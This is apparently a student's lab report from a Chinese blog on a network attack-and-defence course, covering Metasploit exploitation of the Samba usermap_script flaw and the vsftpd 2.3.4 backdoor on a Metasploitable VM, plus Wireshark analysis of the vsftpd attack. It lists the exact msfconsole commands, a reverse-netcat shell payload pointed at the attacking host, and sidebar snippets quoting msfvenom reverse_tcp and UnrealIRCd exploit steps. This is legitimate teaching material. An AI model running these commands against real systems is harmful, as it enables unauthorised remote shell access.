20222817 2022-2023-2《网络攻防实践》第七周作业

最新推荐文章于 2024-09-14 19:55:29 发布
最新推荐文章于 2024-09-14 19:55:29 发布
阅读量250 收藏
点赞数
文章标签: 网络 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuast_liu/article/details/130383934
版权
本文介绍了使用Metasploit对Linux主机进行远程渗透攻击的实践,包括利用Samba服务的Usermap_script漏洞和Vsftpd后门漏洞。同时展示了防守方如何通过Wireshark进行网络监听和分析攻击过程,强调了及时发现和修复系统漏洞的重要性。
摘要由CSDN通过智能技术生成

目录

1.实践内容

2.实践过程

2.1 实践环境

2.2 实践一:使用Metasploit对Linux主机进行远程渗透攻击

2.3 实践二:攻防对抗实践

3.学习中遇到的问题及解决

4.实践总结

1.实践内容

1.使用Metasploit进行Linux远程渗透攻击:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。

Samba是什么?
Samba是在Linux和UNIX系统上实现SMB (Server Messages Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。

username_script 是什么?
Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。

2.攻防对抗实践:

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击;

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程。

2.实践过程

2.1 实践环境

攻击机:Kali Linux攻击机,其中装有Metasploit Framework渗透程序,IP地址为192.168.200.4
靶机:Metasploitable Ubuntu,IP地址为192.168.200.123

2.2 实践一:使用Metasploit对Linux主机进行远程渗透攻击

打开msfconsole,进入Metasploit命令行界面。

在msf的命令行中,运行命令use exploit/multi/samba/usermap_script,使用Linux靶机上的Samba服务Usermap_script安全漏洞。
运行命令show payloads,显示这个漏洞可用的负载。 

如果没有选择负载,Metasploit会默认选择负载cmd/unix/reverse_netcat。
我们也可以运行命令set payload cmd/unix/reverse_netcat,手动选择这个负载。 

设置攻击目标为Metasploitable ubuntu靶机。set RHOST 192.168.200.123
设置攻击者为本机set LHOST 192.168.200.4,如果不设置,系统也会默认攻击者为本机。
运行命令run,开始攻击。 

输入shell,回车,进入命令行;输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明我们已经成功获取到了靶机的访问权限。 

 

2.3 实践二:攻防对抗实践

这里,我们选择vsftpd后门漏洞。
攻击方打开msfconsole,运行命令search vsftpd,搜索可用漏洞。

输入use exploit/unix/ftp/vsftpd_234_backdoor,选择这个漏洞。 

如果没有选择载荷的话,msf6可能会自动选择一个载荷。
当然,通过运行显示载荷命令show payloads可以发现,这个漏洞只有这一个载荷。 

可以运行这个指令手动选择它:set payload cmd/unix/interact
设置靶机地址set RHOST 192.168.200.123
设置攻击机地址set LHOST 192.168.200.4
防守方打开Wireshark,开始抓包监听。这里打开了同一网络下一台Ubuntu主机的Wireshark。
在攻击机上输入run,开始攻击。 

输入shell,回车,进入命令行;输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明攻击方已经成功获取到了防守方的访问权限。 

防守方从Wireshack上抓到了一些包。 

首先,靶机在收到攻击机的请求后,靶机的FTP协议向攻击机返回了vsFTPd的版本号2.3.4(分组编号:22)
然后,攻击机向靶机发送请求:用户是TKIYaQ:)(分组编号:24)
之后,靶机要求攻击机提供该账户的密码(分组编号:26),攻击机向靶机提供了密码k(分组编号:28)
最后,靶机的FTP服务端验证账户密码是正确的,建立连接,成功建立会话。
跟踪这个TCP流,可以得到如下信息:vsFTPd的版本号是2.3.4;用户是TKIYaQ:);密码是k。 

攻击方还输入了ifconfig查看IP地址,发现这里显示的IP地址就是防守方的IP地址,说明攻击方已经成功获取到了防守方的访问权限。 

3.学习中遇到的问题及解决

暂未发现问题。

4.实践总结

通过本实验使用Usermap_script漏洞进行渗透攻击的过程,我们可以充分看出Linux系统中某些严重的漏洞的危险性,这些漏洞可能会使数据和财产受到严重损害;还让我们充分地认识到及早发现、尽早修复漏洞的重要性。

 

 

 

 

 

 

 

 

 

 

 

 

 

20222817刘家晨
关注
20222807 2022-2023-2 《网络攻防实践第七作业
cc3da的博客
04-19 153
网络攻防实践第七作业
20221905 2022-2023-2 《网络攻防实践》 第7作业
永远骄傲和完美永远不妥协
04-19 286
网络攻防实践》 第7作业
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
Metasploit渗透测试实验报告
ling_xiao007的专栏
02-21 1万+
Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
网络安全工程师教你:如何使用Kali Linux进行Metasploit渗透攻防?【初探】
Kali与编程
09-17 852
Metasploit渗透测试框架基础(一) 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?接下来让我们一起学习! 二、资源装备 1.安装好Kali Linux的虚拟机一台; 2.整装待发的小白一个。 三、战略安排 3.1 在Kali Lin
20222817 2022-2023-2 《网络攻防实践》第一作业
fuast_liu的博客
03-08 173
实践网络攻防环境的搭建1.相关知识点梳理VMware虚拟机网络连接方式,主要有三种:(1)桥接方式(Bridge):在桥接方式下,VMware模拟一个虚拟的网卡给客户系统,主系统对于客户系统来说相当于一个桥接器。客户系统相当于是有自己的网卡一样,自己直接连上网络,也就是说客户系统对于外部直接可见。(2)网络地址转换方式(NAT):在这种方式下,客户系统不能自己连接网络,而必须通过主系统对所有进出网络的客户系统收发的数据包做地址转换。在这种方式下,客户系统对于外界不可见。
20222817 2022-2023-2《网络攻防实践》第十一次作业
fuast_liu的博客
05-23 442
在本次实践中,对几个典型的木马病毒和钓鱼网站进行了复现,体会到了网络木马和钓鱼网站的危害。另外本次实验难度较大、复杂性较高,需要我们认真学习、耐心操作,还要求我们掌握一定的HTML、JavaScript等前端语言。
20221909 2022-2023-2 《网络攻防实践》第1作业
zxr287的博客
03-02 381
实践
20222928 2022-2023-2 《网络攻防实践》第二作业
qq_43791615的博客
03-12 240
20222928 2022-2023-2 《网络攻防实践》第二作业
20222807 2022-2023-2 《网络攻防实践》第一作业
cc3da的博客
03-02 193
网络攻防实践》第一作业
20222925 2022-2023-2 《网络攻防实践》第八次作业
少壮不努力 老大徒伤悲
05-06 262
通过命令“md5sum Rada.exe”查看Rada.exe的摘要信息,结果为:caaa6985a43225a0b3add54f44a0d4c7或通过命令“file RaDa.exe”查看文件格式和操作环境等帮助识别同一样本的基本信息通过本次实践,我学会了通过使用PEiD、IDA等工具分析恶意代码,获取恶意代码的各项信息,对一些端口的攻击命令也更敏感,同时也提高了自我学习的能力以及从繁杂的信息中获取有用信息的能力。
20211915 2022-2023-2 《网络攻防实践》第九作业
ashoreG的博客
05-10 170
网络攻防实验九
使用metasploit进行渗透攻击步骤
Chaos
11-12 9044
鉴于对第五章内存攻防技术的原理难以理解,所以这一章我还是主要用来熟练metasploit这个工具。   攻击过程主要分为以下几步:   1.search XXX(扫描某漏洞对应的模块)   2.use exploit/xxx/xxx/...(启用这个渗透攻击模块)   3.show payloads(作为攻击载荷的payload就是通常所说的shellcode)   4.set payl
客户端渗透之——使用Metasploit实现对Linux客户端的渗透
冰河的专栏
01-24 6716
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633254 攻击机 Kali 192.168.175.128 靶机 CentOS 6.5 192.168.175.132 1.生成elf文件 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175...
使用metasploitlinux系统进行渗透测试提权
渗透测试
05-13 2294
文章目录前言一、生成攻击载荷二、获取目标主机物理访问权限三、加载主控端handler总结 前言 使用metasploitlinux系统进行渗透测试 一、生成攻击载荷 使用msfvenom命令创建一个elf文件 ┌──(root????kali)-[~] └─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf [-] No platform was selecte
2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例
热门推荐
时光隧道
08-29 8万+
一:扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息,扫描结果如下: 其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。 二:UnrealIRCd后门漏洞 1.输入msfconsole命令 2.运行“search unrealircd”命令 3.运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP 4.使用“show options“ 命令查看该expl
4.网络编程
最新发布
weixin_45476535的博客
09-14 407
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 150
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
如何在DPDK中实现协议解析?
Do my best!
09-10 681
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
网络攻防下的Q-learning防御决策:不完全信息随机博弈的创新策略
本文主要探讨了一种创新的防御决策策略,即在不完全信息随机博弈理论框架下结合Q-learning算法,以解决网络攻防中的实际问题。...这对于理解和改善现实世界中的网络攻防对抗具有重要的理论和实践价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值